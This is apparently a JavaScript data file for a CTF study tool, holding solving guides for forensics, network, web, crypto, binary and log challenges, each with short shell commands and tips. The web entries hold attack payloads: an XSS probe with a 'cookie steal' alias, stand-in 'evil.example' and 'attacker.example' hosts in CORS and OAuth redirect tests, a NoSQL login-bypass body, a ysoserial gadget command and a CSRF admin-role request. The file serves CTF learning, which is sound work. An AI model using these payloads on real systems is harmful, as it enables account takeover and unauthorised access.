    pitfalls: ["Keep original order. DNS retries can duplicate chunks."],
  },
  {
    id: "usb-keyboard",
    category: "Network",
    difficulty: "Medium",
    title: "USB keyboard capture",
    aliases: ["usb", "hid", "keyboard pcap", "keystrokes"],
    symptoms: "PCAP contains USB HID traffic or prompt mentions keyboard.",
    commands: [shell(["tshark -r usb.pcap -Y 'usb.capdata' -T fields -e usb.capdata", "python3 decode_hid.py usb_keys.txt"])],
    thought: ["HID reports contain keycodes. Decode keycodes into typed characters, handling Shift."],
    pitfalls: ["Different fields are used depending on capture type: `usb.capdata`, `usbhid.data`, or raw URB bytes."],
  },
  {
    id: "ftp-smtp",
    category: "Network",
    difficulty: "Easy",
    title: "FTP/SMTP plaintext extraction",
    aliases: ["ftp", "smtp", "email", "attachment", "credentials"],
    symptoms: "Capture contains FTP login, email, or transferred files.",
    commands: [shell(["tshark -r capture.pcap -Y ftp", "tshark -r capture.pcap -Y smtp", "tcpflow -r capture.pcap", "grep -RaiE 'flag\\{|picoCTF\\{|USER|PASS' ."])],
    thought: ["Old protocols often transmit credentials and files in plaintext."],
    pitfalls: ["Passive FTP uses separate data streams."],
  },
  {
    id: "ssh-auth-log",
    category: "Logs",
    difficulty: "Beginner",
    title: "SSH brute force timeline",
    aliases: ["auth.log", "ssh", "bruteforce", "accepted password"],
    symptoms: "Linux auth logs show many failed logins followed by a success.",
    commands: [shell(["grep -i 'Failed password' auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr | head", "grep -i 'Accepted password' auth.log", "grep -i 'sudo\\|session opened\\|COMMAND=' auth.log"])],
    thought: ["Identify attacker IP, compromised user, successful login time, and commands after login."],
    pitfalls: ["Timezone matters when correlating logs."],
  },
  {
    id: "web-access-log",
    category: "Logs",
    difficulty: "Easy",
    title: "Web access log attack",
    aliases: ["apache", "nginx", "access.log", "sqli log", "webshell"],
    symptoms: "Access logs contain unusual paths, encodings, 500s, or upload/admin requests.",
    commands: [shell(["awk '{print $1}' access.log | sort | uniq -c | sort -nr | head", "grep -Ei 'union|select|\\.\\.\\/|passwd|cmd=|upload|shell|flag' access.log", "grep ' 200 ' access.log | tail -50"])],
    thought: ["Find the unusual IP/path, then reconstruct request sequence leading to flag or shell."],
    pitfalls: ["URL-decode suspicious paths before judging them."],
  },
  {
    id: "base-encoding",
    category: "General Skills",
    difficulty: "Beginner",
    title: "Nested encodings",
    aliases: ["base64", "hex", "url encode", "html entities", "cyberchef"],
    symptoms: "Text has `=`, `%7B`, long hex, or repeated encoded-looking layers.",
    commands: [shell(["echo 'PASTE' | base64 -d", "echo '666c61677b...7d' | xxd -r -p", "python3 - <<'PY'", "import urllib.parse,html", "s='PASTE'", "print(urllib.parse.unquote(s))", "print(html.unescape(s))", "PY"])],
    thought: ["Decode one layer at a time and inspect whether the result looks like another encoding."],
    pitfalls: ["Do not assume base64 because of `=`. Verify the output."],
  },
  {
    id: "qr-barcode",
    category: "General Skills",
    difficulty: "Beginner",
    title: "QR or barcode",
    aliases: ["qr", "barcode", "aztec", "data matrix"],
    symptoms: "Image contains visible code, distorted squares, or barcode-like lines.",
    commands: [shell(["zbarimg code.png", "python3 - <<'PY'", "from PIL import Image", "img=Image.open('code.png')", "img.resize((img.width*4,img.height*4)).save('scaled.png')", "PY", "zbarimg scaled.png"])],
    thought: ["Decode directly. If it fails, crop, scale, increase contrast, or invert colors."],
    pitfalls: ["Screenshots can blur QR edges. Rescale with nearest-neighbor when possible."],
  },
  {
    id: "git-history",
    category: "General Skills",
    difficulty: "Easy",
    title: "Git history secret",
    aliases: ["git", "commit", "reflog", "stash", "deleted file"],
    symptoms: "Challenge gives a repository or `.git` folder.",
    commands: [shell(["git log --oneline --all --decorate", "git grep -n 'flag\\|picoCTF' $(git rev-list --all)", "git fsck --lost-found", "git stash list", "git show <commit>:<path>"])],
    thought: ["Deleted secrets remain in history unless rewritten. Search every commit, branch, stash, and dangling blob."],
    pitfalls: ["`git grep` on working tree only is not enough."],
  },
];

const mini = (id, category, difficulty, title, aliases, symptoms, commands, thought, pitfalls = []) => ({
  id,
  category,
  difficulty,
  title,
  aliases,
  symptoms,
  commands: [shell(commands)],
  thought,
  pitfalls: pitfalls.length ? pitfalls : ["Keep notes on what changed after each command so you do not loop on the same failed idea."],
});

guides.push(
  mini("zero-width", "General Skills", "Beginner", "Zero-width Unicode text", ["unicode", "zero width", "invisible text"], "Text looks normal but copy/paste length is suspicious.", ["python3 - <<'PY'", "from pathlib import Path", "s=Path('note.txt').read_text()", "print([(hex(ord(c)), c) for c in s if ord(c)>127][:200])", "PY"], ["Invisible Unicode can encode bits or hide delimiters. Print codepoints, then map zero-width variants to binary."]),
  mini("whitespace-stego", "General Skills", "Beginner", "Whitespace steganography", ["spaces tabs", "snow", "trailing whitespace"], "A text file has strange trailing spaces or tabs.", ["sed -n l file.txt | head", "python3 - <<'PY'", "s=open('file.txt').read()", "bits=''.join('0' if c==' ' else '1' for c in s if c in ' \\t')", "print(bits[:200])", "PY"], ["Whitespace is data. Make tabs/spaces visible, then map them to bits."]),
  mini("ansi-escape", "General Skills", "Beginner", "ANSI escape hidden text", ["terminal colors", "ansi", "escape codes"], "Terminal output or text file has weird color/control sequences.", ["cat -v output.txt", "sed -r 's/\\x1B\\[[0-9;]*[mK]//g' output.txt", "strings -a output.txt | grep -E 'flag\\{|picoCTF\\{'"], ["Escape codes can hide, overwrite, or color text. View raw control characters."]),
  mini("protobuf", "General Skills", "Medium", "Protobuf blob", ["protobuf", "proto", "serialized"], "Unknown binary has small fields and repeated varint-looking structure.", ["protoc --decode_raw < message.bin", "strings -a message.bin"], ["Try decode_raw when a service challenge passes binary structured messages."]),
  mini("bmp-padding", "Forensics", "Easy", "BMP row padding", ["bmp", "padding bytes", "bitmap"], "BMP image opens, but prompt hints at padding or rows.", ["file image.bmp", "python3 - <<'PY'", "# Inspect bytes after each BMP row based on width/depth alignment", "PY"], ["BMP rows are padded to 4-byte boundaries. Hidden data can live in unused padding."]),
  mini("png-chunks", "Forensics", "Easy", "Custom PNG chunks", ["png chunks", "ancillary chunk", "chunk"], "PNG contains nonstandard chunk names or suspicious chunk order.", ["pngcheck -v image.png", "exiftool image.png", "strings -a image.png | grep -E 'flag\\{|picoCTF\\{'"], ["PNG chunks are typed containers. Unknown ancillary chunks may hold text or compressed data."]),
  mini("palette-image", "Forensics", "Easy", "Indexed palette clue", ["palette", "indexed png", "color table"], "Small PNG/GIF uses indexed colors and odd palette values.", ["pngcheck -v image.png", "magick image.png txt:- | head", "python3 - <<'PY'", "from PIL import Image", "img=Image.open('image.png')", "print(img.mode, img.getpalette()[:60])", "PY"], ["Indexed images can encode data in palette order, not just pixels."]),
  mini("file-chunks", "Forensics", "Beginner", "Split file reassembly", ["chunks", "parts", "split file"], "Folder contains many numbered parts or filenames with offsets.", ["ls -v", "cat part* > joined.bin", "file joined.bin", "binwalk joined.bin"], ["Sort naturally, concatenate, then identify the result."]),
  mini("ntfs-ads", "Forensics", "Medium", "NTFS alternate data stream", ["ads", "alternate data stream", "ntfs"], "Windows/NTFS challenge hints at hidden streams.", ["fls -r image.ntfs", "icat image.ntfs '<inode>:<stream>'", "7z l disk.img"], ["NTFS files can have named streams invisible in normal listings."]),
  mini("sqlite-deleted", "Forensics", "Medium", "Deleted SQLite rows", ["sqlite", "deleted rows", "database"], "App database contains missing or deleted messages.", ["sqlite3 app.db '.tables'", "sqlite3 app.db 'select * from sqlite_master;'", "strings -a app.db | grep -E 'flag\\{|picoCTF\\{'", "sqlite3 app.db '.recover'"], ["SQLite pages can retain deleted content. Try `.recover` and raw strings."]),
  mini("xss-admin-bot", "Web", "Medium", "XSS with admin bot", ["xss", "admin bot", "cookie steal"], "Input is rendered in a page visited by a bot/admin.", ["curl 'http://host/?q=<script>alert(1)</script>'", "python3 -m http.server 8000", "# Use challenge-approved callback only"], ["Confirm script execution, then read accessible page state or send data to an allowed callback."]),
  mini("csrf", "Web", "Easy", "CSRF action trigger", ["csrf", "cross-site request forgery"], "State-changing endpoint lacks CSRF token and uses cookie auth.", ["curl -i -X POST http://host/change-role -b cookies.txt -d 'role=admin'"], ["If browser cookies authenticate actions without a token, a crafted request can trigger admin actions."]),
  mini("cors", "Web", "Easy", "CORS misconfiguration", ["cors", "origin", "access-control"], "API reflects arbitrary Origin or allows credentials broadly.", ["curl -i http://host/api/secret -H 'Origin: https://evil.example'"], ["Check `Access-Control-Allow-Origin` and `Allow-Credentials`."]),
  mini("nosql", "Web", "Easy", "NoSQL injection", ["nosql", "mongodb", "$ne", "$regex"], "Login/API accepts JSON and backend likely uses MongoDB.", ["curl -X POST http://host/login -H 'Content-Type: application/json' -d '{\"user\":{\"$ne\":null},\"pass\":{\"$ne\":null}}'"], ["Operators like `$ne` or `$regex` can alter query semantics if input is not sanitized."]),
  mini("deserialization", "Web", "Hard", "Insecure deserialization", ["pickle", "java serialized", "php serialize", "ysoserial"], "Cookie/body starts with serialized object markers or base64 object data.", ["base64 -d token.txt | xxd | head", "ysoserial CommonsCollections1 'id' | base64"], ["Identify framework and gadget surface before generating payloads."]),
  mini("php-type-juggling", "Web", "Easy", "PHP type juggling", ["php", "magic hash", "0e", "=="], "PHP code uses loose comparison for hashes or tokens.", ["php -r \"var_dump('0e123' == '0e999');\"", "grep -Rni '==' ."], ["Loose comparisons can make magic hashes equal numeric zero."]),
  mini("request-smuggling", "Web", "Hard", "HTTP request smuggling", ["smuggling", "cl te", "te cl"], "Proxy/frontend and backend disagree on Content-Length or Transfer-Encoding.", ["python3 -m pip install http-request-smuggler", "smuggler.py -u http://host/"], ["Look for front/back parsing disagreement, then poison or reach internal routes."]),
  mini("oauth-redirect", "Web", "Medium", "OAuth redirect URI bypass", ["oauth", "redirect_uri", "sso"], "Login flow includes redirect_uri or state parameters.", ["curl -i 'http://host/oauth?redirect_uri=https://attacker.example/cb'"], ["Try exact-match bypasses, subdomain confusion, path traversal, and open redirects."]),
  mini("aes-ecb", "Cryptography", "Easy", "AES ECB pattern leak", ["aes ecb", "block cipher", "penguin"], "Ciphertext repeats in 16-byte blocks or encrypted image keeps structure.", ["python3 - <<'PY'", "data=open('cipher.bin','rb').read()", "blocks=[data[i:i+16] for i in range(0,len(data),16)]", "print(len(blocks)-len(set(blocks)), 'repeated blocks')", "PY"], ["ECB encrypts equal plaintext blocks equally. Repetition is the signal."]),
  mini("cbc-bitflip", "Cryptography", "Medium", "CBC bit flipping", ["cbc bitflip", "admin true", "iv"], "Encrypted cookie decrypts to structured text and app accepts modified ciphertext.", ["python3 - <<'PY'", "# flip C[i] bits to control P[i+1] bytes", "PY"], ["In CBC, changing previous ciphertext block flips bits in next plaintext block."]),
  mini("ctr-nonce-reuse", "Cryptography", "Medium", "CTR nonce reuse", ["ctr", "nonce reuse", "stream cipher"], "Two ciphertexts encrypted with same key/nonce.", ["python3 - <<'PY'", "c1=bytes.fromhex('') ; c2=bytes.fromhex('')", "print(bytes(a^b for a,b in zip(c1,c2)))", "PY"], ["CTR becomes a stream cipher. Reusing keystream gives plaintext XOR."]),
  mini("length-extension", "Cryptography", "Medium", "Hash length extension", ["length extension", "sha1", "md5", "secret prefix"], "Token is hash(secret || message), and you can append data.", ["hashpump -s <hash> -d 'user=guest' -a '&admin=true' -k 16"], ["Merkle-Damgard hashes allow appending without knowing secret length if MAC is built wrong."]),
  mini("ecdsa-nonce", "Cryptography", "Hard", "ECDSA nonce reuse", ["ecdsa", "nonce reuse", "r repeated"], "Two signatures have the same r value.", ["python3 - <<'PY'", "# k = (h1-h2)/(s1-s2) mod n, then recover private key", "PY"], ["Repeated nonce reveals the private key. Search signatures for duplicate r."]),
  mini("shamir", "Cryptography", "Medium", "Shamir secret sharing", ["shamir", "shares", "threshold"], "Challenge gives coordinate shares like (x, y).", ["python3 - <<'PY'", "# interpolate f(0) over the given field", "PY"], ["The secret is the polynomial value at x=0. Use enough shares to interpolate."]),
  mini("srop", "Binary Exploit", "Hard", "Sigreturn oriented programming", ["srop", "sigreturn", "syscall"], "Binary has syscall gadget and limited ROP gadgets.", ["ROPgadget --binary ./vuln | grep syscall", "python3 - <<'PY'", "from pwn import *", "frame=SigreturnFrame()", "PY"], ["Build fake signal frame to control registers when normal ROP is constrained."]),
  mini("stack-canary", "Binary Exploit", "Medium", "Stack canary leak", ["canary", "stack protector"], "Overflow crashes unless canary is preserved.", ["checksec --file ./vuln", "python3 - <<'PY'", "# leak canary with format string or read overrun, then include it in payload", "PY"], ["Do not overwrite canary blindly. Leak it first or brute force fork servers byte by byte."]),
  mini("pie-aslr", "Binary Exploit", "Medium", "PIE/ASLR base leak", ["pie", "aslr", "leak"], "Addresses change each run, but a pointer leak is available.", ["checksec --file ./vuln", "python3 - <<'PY'", "# base = leaked_symbol - known_offset", "PY"], ["Calculate binary/libc base from a leaked pointer before building addresses."]),
  mini("seccomp", "Binary Exploit", "Hard", "Seccomp sandbox bypass", ["seccomp", "sandbox", "orw"], "Shell spawning fails or checksec/seccomp-tools shows syscall filter.", ["seccomp-tools dump ./vuln", "ROPgadget --binary ./vuln"], ["If execve is blocked, build open-read-write ROP to print the flag file."]),
  mini("angr-constraints", "Reverse Engineering", "Medium", "Constraint solve with angr/Z3", ["angr", "z3", "constraints"], "Password checker has many arithmetic/bitwise constraints.", ["python3 - <<'PY'", "import angr, claripy", "# model symbolic stdin and find success address", "PY"], ["When validation is pure logic, symbolic execution can find satisfying input."]),
  mini("upx-packed", "Reverse Engineering", "Easy", "UPX packed binary", ["upx", "packed"], "Strings are sparse and binary contains UPX markers.", ["strings -a chall | grep UPX", "upx -d chall -o unpacked", "file unpacked"], ["Unpack first so decompiler sees real code."]),
  mini("dotnet", "Reverse Engineering", "Easy", ".NET decompilation", [".net", "csharp", "dnspy", "ilspy"], "Windows executable or DLL is managed .NET.", ["file chall.exe", "ilspycmd chall.exe", "strings -a chall.exe | grep -i flag"], [".NET usually decompiles cleanly. Inspect validation methods and resources."]),
  mini("go-binary", "Reverse Engineering", "Medium", "Go binary reversing", ["go", "golang", "stripped"], "Large static ELF with Go build strings.", ["strings -a chall | grep -i 'go build'", "go tool nm chall 2>/dev/null | head", "rabin2 -zz chall"], ["Go binaries are noisy. Start from strings and function name recovery."]),
  mini("irc-chat", "Network", "Easy", "IRC/chat reconstruction", ["irc", "chat", "tcp stream"], "PCAP contains chat protocol traffic.", ["tshark -r capture.pcap -Y irc", "tcpflow -r capture.pcap", "grep -RaiE 'flag\\{|picoCTF\\{' ."], ["Reassemble streams; chat messages are usually plaintext."]),
  mini("icmp-data", "Network", "Easy", "ICMP payload data", ["icmp", "ping", "payload"], "Many ping packets with unusual payload sizes.", ["tshark -r capture.pcap -Y icmp -T fields -e data.data | tr -d '\\n' | xxd -r -p"], ["ICMP payload bytes can carry exfiltrated data."]),
  mini("tcp-flags", "Network", "Medium", "TCP flags encode bits", ["tcp flags", "packet flags", "timing"], "Packet flags/timing look intentionally patterned.", ["tshark -r capture.pcap -T fields -e tcp.flags", "tshark -r capture.pcap -T fields -e frame.time_epoch"], ["Covert channels can encode bits in flags, ports, lengths, or timing."]),
  mini("voip-rtp", "Network", "Medium", "VoIP RTP audio extraction", ["voip", "rtp", "sip", "audio"], "PCAP contains SIP/RTP traffic.", ["tshark -r call.pcap -Y rtp", "rtpbreak -r call.pcap -o rtpout"], ["Extract RTP streams and listen or spectrogram the audio."]),
  mini("windows-events", "Logs", "Medium", "Windows Event Log timeline", ["evtx", "windows event", "sysmon"], "Challenge gives .evtx files or Windows logs.", ["python3 -m pip install python-evtx", "evtx_dump.py Security.evtx | grep -Ei '4624|4688|flag|powershell'"], ["Correlate logon events, process creation, PowerShell, and persistence."]),
  mini("powershell", "Logs", "Medium", "PowerShell encoded command", ["powershell", "encodedcommand", "base64 utf16"], "Logs contain `-EncodedCommand` or long base64 blobs.", ["python3 - <<'PY'", "import base64", "s='PASTE'", "print(base64.b64decode(s).decode('utf-16le', errors='replace'))", "PY"], ["PowerShell encoded commands are usually UTF-16LE base64. Decode before analyzing."]),
  mini("cron-persistence", "Logs", "Easy", "Cron persistence clue", ["cron", "persistence", "linux"], "Linux artifact contains cron files or suspicious scheduled commands.", ["grep -RniE 'curl|wget|bash|flag|sh' /etc/cron* . 2>/dev/null", "cat /var/log/syslog | grep CRON"], ["Scheduled jobs reveal attacker persistence or recurring flag-writing scripts."]),
  mini("cloudtrail", "Logs", "Hard", "CloudTrail compromise timeline", ["cloudtrail", "aws logs", "iam"], "JSON logs contain AWS API calls.", ["jq -r '.Records[] | [.eventTime,.eventName,.userIdentity.arn,.sourceIPAddress] | @tsv' cloudtrail.json", "grep -RniE 'CreateAccessKey|AssumeRole|PutBucket|GetObject' ."], ["Order events by time, identify principal, then trace privilege escalation and exfiltration."]),
);

guides.push(...expandedGuides);

for (const guide of guides) {
  const detail = guideDetails[guide.id];
  if (detail) {
    guide.explain = detail.explain;
    guide.apply = detail.apply;
  }
}

export const quickChecks = [
  { label: "Identify file", command: "file <target> && xxd -l 64 <target>" },
  { label: "Raw flag scan", command: "strings -a <target> | grep -E 'flag\\{|picoCTF\\{|CTF\\{'" },
  { label: "Metadata", command: "exiftool <target>" },
  { label: "Embedded data", command: "binwalk <target> && foremost -i <target> -o carved" },
  { label: "Archive list", command: "7z l <target> || unzip -l <target> || tar tf <target>" },
  { label: "Search folder", command: "grep -RaiE 'flag\\{|picoCTF\\{|password|secret|admin' ." },
  { label: "Detect encoding", command: "python3 -c \"import base64,pathlib; print(base64.b64decode(pathlib.Path('<target>').read_text().strip()))\"" },
  { label: "Compare hashes", command: "shasum -a 256 <target> && md5 <target>" },
  { label: "Find file types", command: "find . -type f -exec file {} \\;" },
  { label: "Network summary", command: "tshark -r <target> -q -z io,phs" },
];

export const installHints = [
  "brew install exiftool binwalk foremost wireshark john hashcat imagemagick zbar",
  "python3 -m pipx install pwntools",
  "python3 -m pip install pillow pycryptodome z3-solver scapy",
  "brew install tesseract  # OCR for visual flags in images",
  "brew install sevenzip sleuthkit ffmpeg sox",
  "brew install jadx apktool ghidra",
];

export const tutorialPaths = [
  {
    label: "Start with a mystery file",
    description: "Identify bytes, scan strings, and uncover a hidden image.",
    guideId: "binary-digits-image",
  },
  {
    label: "Map a web challenge",
    description: "Inspect exposed files before testing input handling.",
    guideId: "source-leak",
  },
  {
    label: "Decode an unknown message",
    description: "Recognize common encodings and peel back each layer.",
    guideId: "base-encoding",
  },
  {
    label: "Begin binary exploitation",
    description: "Check protections and redirect execution to a win function.",
    guideId: "ret2win",
  },
];
